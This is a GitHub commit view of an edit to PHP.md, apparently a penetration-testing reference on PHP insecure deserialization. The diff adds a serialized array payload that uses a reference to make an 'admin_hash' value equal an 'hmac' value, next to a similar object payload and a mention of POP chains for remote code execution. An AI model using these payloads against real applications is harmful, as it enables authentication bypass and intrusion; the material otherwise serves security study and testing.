Update PHP.md

patch-1
Muhammad Fikri Ashari 2020-09-25 09:43:35 +07:00 committed by GitHub
parent 0a01854a6a
commit 992732877f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 1 deletions

View File

@ -111,6 +111,12 @@ Payload:
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
```
We can do an array to like this:
```php
a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
```
## Finding and using gadgets
Also called "PHP POP Chains", they can be used to gain RCE on the system.
@ -193,4 +199,4 @@ $poc->stopBuffering();
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)